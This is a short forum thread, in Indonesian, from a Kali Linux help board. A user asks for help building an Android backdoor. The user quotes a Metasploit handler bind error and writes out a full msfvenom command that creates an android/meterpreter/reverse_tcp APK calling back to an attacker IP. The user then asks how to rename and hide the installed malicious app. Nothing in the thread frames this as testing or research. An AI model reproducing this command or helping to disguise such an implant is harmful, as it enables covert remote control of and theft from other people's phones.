Indonesian Back|Track Team
Ask Backdoor [--] Handler Failed to bind to XXX.XXX.XXX.X:666:- - - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Kali Linux (https://www.indonesianbacktrack.or.id/forum/forum-232.html)
+---- Forum: Kali Linux Ask & Question (https://www.indonesianbacktrack.or.id/forum/forum-229.html)
+---- Thread: Ask Backdoor [--] Handler Failed to bind to XXX.XXX.XXX.X:666:- - (/thread-6894.html)



Backdoor [--] Handler Failed to bind to XXX.XXX.XXX.X:666:- - - 403_forbidden - 09-19-2016

jadi gini,waktu saya mau buat backdoor selalu ada ini 

[--] Handler Failed to bind to XXX.XXX.XXX.X:666:-  -
[*] Started reverse TCP handler on 0.0.0.0:666
[*] Starting the payload handler...

Ini Ada Error atau gmn ya? 

sudah di test di Android file .apk-nya sudah di install,tapi gk muncul session

ada yang bisa bantu? sekalian bantu langkah-langkah buat backdoor yang benar dan tepat kalo bisa,hehe.

Thanks.


RE: Backdoor [--] Handler Failed to bind to XXX.XXX.XXX.X:666:- - - 403_forbidden - 09-21-2016

(09-19-2016, 08:06 PM)403_forbidden Wrote: jadi gini,waktu saya mau buat backdoor selalu ada ini 

[--] Handler Failed to bind to XXX.XXX.XXX.X:666:-  -
[*] Started reverse TCP handler on 0.0.0.0:666
[*] Starting the payload handler...

Ini Ada Error atau gmn ya? 

sudah di test di Android file .apk-nya sudah di install,tapi gk muncul session

ada yang bisa bantu? sekalian bantu langkah-langkah buat backdoor yang benar dan tepat kalo bisa,hehe.

Thanks.

Masalah Diatas SOLVED,tapi ada masalah lagi nih,

waktu buat backdoor pake msfvenom -p android/meterpreter/reverse_tcp LHOST=180.252.XXX.XXX LPORT=7777 R> Nama_File.apk

Berhasil,udah diinstall di Android,Berhasil Nama Paketnya Nama_File.apk tapi pas mau Download berubah jadi Main Activity,cara merubah namanya sama uinstallnya gmn ya?

Mohon dijawab brother